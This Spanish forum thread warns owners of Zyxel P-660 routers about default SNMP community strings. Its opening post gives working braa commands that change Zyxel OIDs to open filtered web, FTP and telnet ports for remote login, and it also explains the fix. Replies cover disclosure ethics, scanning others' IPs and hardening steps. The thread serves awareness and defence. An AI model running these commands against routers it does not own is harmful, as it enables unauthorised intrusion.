Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
14-12-2017, 11:13 (Jueves)
Inicio Ayuda Reglas Buscar Ingresar Registrarse
Noticias:
Liberada wifislax64-1.1 version final para descargar

Videos Downloader




+  Seguridad Wireless - Wifi
|-+  Equipos y materiales
| |-+  Puntos de acceso, routers, switchs y bridges (Moderadores: jar229, Samuelongui)
| | |-+  ¿ Tienes un Zyxel ? !!! Cuidado !!!
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: ¿ Tienes un Zyxel ? !!! Cuidado !!!  (Leído 40050 veces)
5.1
Colaborador
*
Desconectado Desconectado

Mensajes: 527


@352E31


Ver Perfil
« : 04-12-2009, 19:24 (Viernes) »

Había oido hablar e incluso puesto en practica alguna vulnerabilidad en routers Zyxel, pero a estas alturas creí que el tema estaba solucionado.
Nada más lejos de la realidad, más bien al contrario, y si no lo crees, sigue leyendo.
Leyendo un paper de d00han.t3am , no he tenido otro remedio que recrear el escenario del ataque.

Que quede bien claro que lo que voy a explicar aquí, ha sido realizado con 2 lineas ADSL de mi propiedad.
RECREAR ESTE DOCUMENTO CON CONEXIONES AJENAS, ES ILEGAL Y NI YO NI ESTA WEB SE HACEN CARGO DE LAS CONSECUENCIAS.  

A pesar de que lo advierto, como se que algunos harán mal uso de la información que expongo, por ética, omitiré algunas partes del paper que podrían generar ataques masivos a estos routers.

Empezamos.. lo primero los routers vulnerables a este ataque, P-660HW-D1 , P-660R-D1 , P-660HW-61.

En mi caso, el escenario lo recreé con un P-660HW-D1 con la configuracíon original de telefónica, y su firm por supuesto,
Despues de poner el router a manejar mi conexion, pobre, llevaba mucho en el armario, miro la ip pública que tengo, a partir de ahora 79.75.X.X.

Cito textualmente del paper :

Citar
Por defecto, algunos routers de la serie 600 traen el servicio SNMP activado con su respectivo puerto UDP 161 abierto accesible desde la interface LAN y WAN.
Esto en si no es un problema siempre y cuando se proteja por contraseña y no se pueda modificar nada. Pues normalmente no es asi, es decir, la contraseñaa de lectura o GET es "public" y la de escritura o SET es "public" y no existe ningun tipo de filtrado a este puerto/protocolo.

Normalmente, el protocolo SNMP y los datos a los que se acceden se utilizan para monitorizar el estado del dispositivo. La brecha de seguridad se abre aqui, pero realmente el problema viene cuando podemos MODIFICAR la configuracion del dispositivo a nuestro antojo.

Dicho de manera muy simple, el protocolo SNMP utiliza MIBs para intereaccionar con el dispositivo. Por ejemplo, si hacemos una peticion SNMP a un router usando la OID .1.3.6.1.2.1.1.1.0 nos respondera con un string indicando el Modelo.

Una MIB digamos que es una base de datos de OIDs para interaccionar con un dispositivo via protocolo SNMP. Las MIBs que utilizamos aqui no son las "estandar" . Son especificas de los routers ZyXEL y es mas, muchas de ellas tampoco aparecen en la documentacion oficial, se han obtenido, digamos que, por fuerza bruta. Las OIDs estan estructuradas jerarquicamente y "andando" por ellas y bajando de nivel podemos encontrar sorpresas; sorpresas que nos pueden ayudar a cambiar la configuracion sin permisos de administrador.

ZyXEL por ejemplo, tiene MIBs propias, se encabezan bajo la jeraquia:

     :.1.3.6.1.4.1.890.1.x.y.z

Vamos al lio...

El soft que necesitamos (bajo linux)

- nmap
- braa

Encontrar, instalar, o explicar el funcionamiento de este soft, no es parte de este post.

Lanzamos braa para confirmar el modelo del router ...

Código:
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.2.1.1.1.0
79.155.X.X:112ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1
1 queries made, 1 queries acknowledged.

Scaneamos con nmap los puertos WEB,FTP y TELNET

Código:
# nmap -p 80,21,23 79.155.X.X
tarting Nmap 5.00 ( http://nmap.org ) at 2009-12-04 17:51 CET
Interesting ports on XXX.Red-79-155-XX.dynamicIP.rima-tde.net (79.155.XX.XXX):
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http

Confirmamos el filtrado de los puertos

El 80

Código:
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4
79.155.XX.XXX:82ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:80
1 queries made, 1 queries acknowledged.

El 21

Código:
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5
79.155.XX.XXX:82ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:21
1 queries made, 1 queries acknowledged.

El 23

Código:
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6
79.155.XX.XXX:82ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:23
1 queries made, 1 queries acknowledged.

Bien, es hora de cambiar los valores

WEB

Código:
#braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i81
79.155.X.X:123ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set.
1 queries made, 1 queries acknowledged.

FTP

Código:
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i22
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.

TELNET

Código:
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i24
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.

Volvemos a pasar el nmap

Código:
# nmap -p 80,21,23 79.155.X.X
Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-04 17:57 CET
Interesting ports on XXX.Red-79-155-XX.dynamicIP.rima-tde.net (79.155.XX.XXX):
21/tcp open ftp
23/tcp open telnet
80/tcp open http

Y si... estan accesibles ahora .....

Código:
r2d2@K-PAX:~/Scripts$ ftp 79.155.X.X
Connected to 79.155.X.X
220  FTP version 1.0 ready at Sun Jan 23 20:43:39 2000
Name (79.155.X.X:r2d2): 1234
331 Enter PASS command
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>



r2d2@K-PAX:~/Scripts$ telnet 79.155.X.X
Trying 79.155.X.X...
Connected to 79.155.X.X
Escape character is '^]'.

Password:****

 Copyright (c) 1994 - 2006 ZyXEL Communications Corp.

                              P-660HW-D1 Main Menu

     Getting Started                      Advanced Management
       1. General Setup                     21. Filter Set Configuration
       2. WAN Backup Setup                  22. SNMP Configuration
       3. LAN Setup                         23. System Security
       4. Internet Access Setup             24. System Maintenance
                                            25. IP Routing Policy Setup
     Advanced Applications                  26. Schedule Setup
       11. Remote Node Setup
       12. Static Routing Setup
       14. Dial-in User Setup               99. Exit
       15. NAT Setup





                          Enter Menu Selection Number:  


Please enter a number

A partir de aquí, vamos, no hace falta explicar las posibilidades que se abren ...


Dejemos las cosas como estaban a nuestro router :

WEB

Código:
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i80
79.155.X.X:123ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set.
1 queries made, 1 queries acknowledged.

FTP

Código:
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i21
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.

TELNET

Citar
braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i23
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.

Nos aseguramos ...

Código:
nmap -p 80,21,23 79.155.X.X
tarting Nmap 5.00 ( http://nmap.org ) at 2009-12-04 18:09 CET
Interesting ports on XXX.Red-79-155-XX.dynamicIP.rima-tde.net (79.155.XX.XXX):
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http

Cabe decir, que a dia de hoy, scanenando un rango de ips de la forma adecuada con braa, es impresionante la cantidad de routers que aparecen.
Así que si tienes uno de estos, ponte las pilas...

Lista de OIDS interesantes :

* Que quereis saber que MAC tiene la IP interna 192.168.1.33 pues nada....
Código:
# ./braa -v -x -p 200 public@79.155.X.X:.1.3.6.1.2.1.4.22.1.2.1.192.168.1.33
79.155.X.X:107ms:.1.3.6.1.2.1.4.22.1.2.1.192.168.1.33:00148525ee19   (ES MI MAC)

* Listar los interfaces de red:

OID: .1.3.6.1.2.1.2.2.1.2.1
Value: enet0

OID: .1.3.6.1.2.1.2.2.1.2.2
Value: enet1

OID: .1.3.6.1.2.1.2.2.1.2.3
Value: pppoe

Para terminar, la forma de corregir esto en nuestro router es cambiar la password GET y SET en el menú SNMP.

Espero que os haya gustado, y dejo bien claro que yo solo explico mi experiencia de realizar lo explicado en el paper, no soy su autor.

PD : Se que no es un tema wireless, pero crei que era conveniente difundir este error de configuracion del Zyxel, si creeis que me he pasado publicando esto aqui, podeis borrarlo...

Saludos
« Última modificación: 04-12-2009, 19:27 (Viernes) por 5.1 » En línea

Qui non intelligit aut taceat aut discat
uNbAs
Visitante
« Respuesta #1 : 04-12-2009, 19:51 (Viernes) »

Aun que no sea un Tema Wireless o algo centrado absolutamente en el mismo este tipo de cosas esta bien saberlas, por lo menos para poder prevenirlas.

Muy bueno lo de no poner el paper al 100% asi por lo menos se intenta evitar intrusiones ilegales.

Gracias por el post  Wink
En línea
5.1
Colaborador
*
Desconectado Desconectado

Mensajes: 527


@352E31


Ver Perfil
« Respuesta #2 : 05-12-2009, 14:58 (S?bado) »

Aun que no sea un Tema Wireless o algo centrado absolutamente en el mismo este tipo de cosas esta bien saberlas, por lo menos para poder prevenirlas.

Muy bueno lo de no poner el paper al 100% asi por lo menos se intenta evitar intrusiones ilegales.

Gracias por el post  Wink

Ok, porque no tenía muy claro si postearlo o no...
En fin, gracias a vosotros...
En línea

Qui non intelligit aut taceat aut discat
drvalium
Moderador Global
*
Desconectado Desconectado

Mensajes: 17473


Misántropo


Ver Perfil
« Respuesta #3 : 05-12-2009, 15:50 (S?bado) »

yo tengo uno de esos, muy bueno el tema Wink

y solo por tocarle un poco los testiculos a uNbAS Grin

¿que mas da si tiene que ver con WIFI o no? en esta sección también se puede hablar de routers no WIFI, o al menos eso da a entender el titulo de la zona.

Equipos y materiales

  • Puntos de acceso, routers, switchs y bridges
    Sección exclusiva de Puntos de acceso, routers, switchs y bridges

un drsaludo Wink
En línea
francisco_20
****
Desconectado Desconectado

Mensajes: 66


Ver Perfil
« Respuesta #4 : 10-12-2009, 21:53 (Jueves) »

Decir que lo he comprobado, y efectivamente, funciona.
Tambien he de decir, que ando esperando la carta de advertencia por parte de telefonica, por el hecho de escanear un rango de ip en busca de "vulnerabilidades".

Esto ultimo, lo confirmo, por parte de un amigo, que ya le ha llegado cartas de "advertencia" por escanear ips ajenas tuyas.

He de decir, que la ip que yo escaneé, y por lo tanto, hize pruebas, es de un familiar, por lo que..... ando tranquilo.

Lo dicho, a cambiar la config por defecto de los zyxels!!

Saludos.
En línea
drvalium
Moderador Global
*
Desconectado Desconectado

Mensajes: 17473


Misántropo


Ver Perfil
« Respuesta #5 : 10-12-2009, 22:09 (Jueves) »

Esto ultimo, lo confirmo, por parte de un amigo, que ya le ha llegado cartas de "advertencia" por escanear ips ajenas tuyas.

me puedes explicar esto mejor Huh Huh Huh

¿una carta por escanear IP's ajenas? Huh Huh Huh

¿escanear IP's es ilegal? Huh Huh Huh


un saludo
En línea
5.1
Colaborador
*
Desconectado Desconectado

Mensajes: 527


@352E31


Ver Perfil
« Respuesta #6 : 10-12-2009, 22:43 (Jueves) »

Decir que lo he comprobado, y efectivamente, funciona.
Tambien he de decir, que ando esperando la carta de advertencia por parte de telefonica, por el hecho de escanear un rango de ip en busca de "vulnerabilidades".

Esto ultimo, lo confirmo, por parte de un amigo, que ya le ha llegado cartas de "advertencia" por escanear ips ajenas tuyas.

He de decir, que la ip que yo escaneé, y por lo tanto, hize pruebas, es de un familiar, por lo que..... ando tranquilo.

Lo dicho, a cambiar la config por defecto de los zyxels!!

Saludos.

Si no hay quejas por parte de el dueño de la Ip que scaneas, no hay carta, pero si, hace ya unos años, a mi me mandaron una, pero me decian que revisara mi sistema por si tenia algún virus.

Eso si, ademas de el scaneo, en esa ocasión, entre por recursos compartidos.

Saludos..
En línea

Qui non intelligit aut taceat aut discat
francisco_20
****
Desconectado Desconectado

Mensajes: 66


Ver Perfil
« Respuesta #7 : 15-12-2009, 18:23 (Martes) »

Tal como advierte el documento, es cierto, q es "ilegal" ( no se hasta que punto.... ) escanear los puertos de ips ajenas.

Lo digo, porque, un colega, en efecto, tiene su cartita, diciendo lo mismo, que revise de si el pc tiene algo chungo etc etc.
Y lo unico q hizo, fue, escanear ciertas ips en busca de vulneraribilidades para entrar en un sistema que no es el suyo ( trataba de reventar x web ).

Tambien, cuando un pc está infectao de spam, logicamente, al mandar tu maquina tantisimo spam, tambien avisan, diciendo q.... revises el pc.

En definitiva, todos sabemos que los ISP, en todo momento deben de saber que hacemos, o que dejamos de hacer xD ( ya entra en juego lo que es intimidad o jaleos de esos xD )

Si finalmente llega la carta, la escaneo, y la vemos todos Grin

Saludos.
En línea
jorge sca
**
Desconectado Desconectado

Mensajes: 19


Ver Perfil
« Respuesta #8 : 13-07-2010, 14:40 (Martes) »

que tendria yo que modificar en mi router para que no se pudiesen colar como pedro por su casa??
En línea
drvalium
Moderador Global
*
Desconectado Desconectado

Mensajes: 17473


Misántropo


Ver Perfil
« Respuesta #9 : 13-07-2010, 15:05 (Martes) »

¿te has leído el tema o solo el titulo?

Para terminar, la forma de corregir esto en nuestro router es cambiar la password GET y SET en el menú SNMP.
En línea
jorge sca
**
Desconectado Desconectado

Mensajes: 19


Ver Perfil
« Respuesta #10 : 07-09-2010, 10:06 (Martes) »

si lo he leido pero lo lei por encima. muchas gracias
En línea
hola-peru
**
Desconectado Desconectado

Mensajes: 1


Ver Perfil
« Respuesta #11 : 17-11-2010, 20:45 (Mi?rcoles) »

hola es la primera vez q entro al foro espero estar en contacto con ustedes bueno veo q hablan de vulneabilidad del rauter zyxel, les cuento q yo trabajo con un rauter zyxel 660 hw31 de franja azul ojo no es inalambrico se puede obtener linea de acceso por este rauter si es asio como evitarlo pq mi red telefonica me dice q ponga un filtro de seguridad como macaffe pq acceden por internet como estar seguro.
En línea
Rasca
**
Desconectado Desconectado

Mensajes: 2


Ver Perfil
« Respuesta #12 : 21-01-2011, 12:16 (Viernes) »

Hola a todos!soy un poco novato en esto y tengo un zyxxel,han tardado muy poco en jodermelo,asi q ahi va mi pregunta:por qué tengo una señal perfecta y tengo internet pero no me puedo conectar,he intentado de todo..el filtrado de mac y no se si lo he hecho bien.Mi problema es q mi ordenador envia paquetes pero por ejemplo tengo 5000 enviados y 1 recibido.a que se debe eso??ha sido de la noche a la mañana y me jode pagarles elinternet a mis vecinos.que puedo hacer???gracias
En línea
Phyrok
****
Desconectado Desconectado

Mensajes: 87


Ave Sekhmet


Ver Perfil
« Respuesta #13 : 21-01-2011, 13:54 (Viernes) »

Muchas gracias por el tutorial, sabía que lo ví en algún lado y ya no recordaba dónde

Cambiado el public que aparece en el menu snmp mediante telnet por otra contraseña (me imagino que serán los tres public que hay, al menos no se ha roto nada Azn ) y capado cualquier acceso remoto a solo web por lan, hale
En línea

Requiescat In Pain...
franalmu
****
Desconectado Desconectado

Mensajes: 83



Ver Perfil
« Respuesta #14 : 25-02-2011, 21:53 (Viernes) »

pues abrá que tener cuidadito  Azn  , de todas formas yo ahora estoy con un comtrend CT-535 de los nuevos que dan. Haber si encuentro vulnerabilidades. Un Saludo! Angry
En línea

MacBook Pro 13" Unibody
IMac 27"
IPhone 5
IPad 4 & Mini
Time Capsule & Airport Extreme WDS
semola
*****
Desconectado Desconectado

Mensajes: 155


Ver Perfil
« Respuesta #15 : 25-02-2012, 12:08 (S?bado) »

¿Seria asi para tapar el agujero?, entrar por telnet en menu 22:

Se haría así? como explica esa persona?:

Get community= nombre inventado diferente de public o private
Set community= nombre inventado diferente de public o private
Trusted host= Pon una IP local. Ej.- 192.168.1.2

Trap:
community= nombre inventado diferente de public o private
destination= Pon una IP local. Ej.- 192.168.1.2


lo que sacado de otro foro que no estoy registrado

http://www.adslzone.net/postp892144.html

 
« Última modificación: 25-02-2012, 12:09 (S?bado) por semola » En línea
5.1
Colaborador
*
Desconectado Desconectado

Mensajes: 527


@352E31


Ver Perfil
« Respuesta #16 : 25-02-2012, 12:16 (S?bado) »

Exacto, con eso tapas el agujero
En línea

Qui non intelligit aut taceat aut discat
d00han.t3am
**
Desconectado Desconectado

Mensajes: 2


Ver Perfil
« Respuesta #17 : 09-08-2012, 09:32 (Jueves) »

Hola soy el autor del "paper" original, y por eso quiero puntualizar un par de cosas:

1º) Estoy convencido de que para que TODOS podamos  aprender y para obligar a los fabricantes y distribuidores de IT a mejorar la seguirad hay que publicar las vulnerabilidades y obligarles a reaccionar.

Por eso, aquí teneis el "paper" completo:

http://www.set-ezine.org/autores.php?autor=d00han.t3am

2º) Lo verdaderamente "ético" es avisar a esos fabricantes y distribuidores. Eso hice, por dos veces. Y no obtuve respuesta  ni se ha visto modificación de la vulnerabilidad.


Por lo expuesto anteriormente desapruebo la frase:

"Muy bueno lo de no poner el paper al 100% asi por lo menos se intenta evitar intrusiones ilegales."


Al final del artículo se explica como solucionarlo y al no publicarlo completo se omite.

Bueno, a lo mejor a sonado a bronca, pero me gusta que aun esté vivo este asunto.  Azn
En línea
semola
*****
Desconectado Desconectado

Mensajes: 155


Ver Perfil
« Respuesta #18 : 09-08-2012, 16:31 (Jueves) »

Pues sinceramente gracias, sólo comentar para lo inexpertos como yo que más vale un ejemplo que mil palabras escritas de las cuales tantos "0" y "1" no entendemos, aunque investigando nos entrramos de otras cosas.
En línea
gr1s0n
**
Desconectado Desconectado

Mensajes: 9


Ver Perfil
« Respuesta #19 : 14-08-2012, 18:05 (Martes) »

no tienen recursos para routers mas seguros los de telefonica, pero les sobra para monitorizar todo el trafico de la red? esto es imposible? q uno haga un sondeo y lo sepan con tantos datos circulando? es q ni filtrando por protocolos XDDDDD
En línea
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios
Si continúa navegando consideramos que acepta su uso. OK Más información | Y más
Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines
SMFAds for Free Forums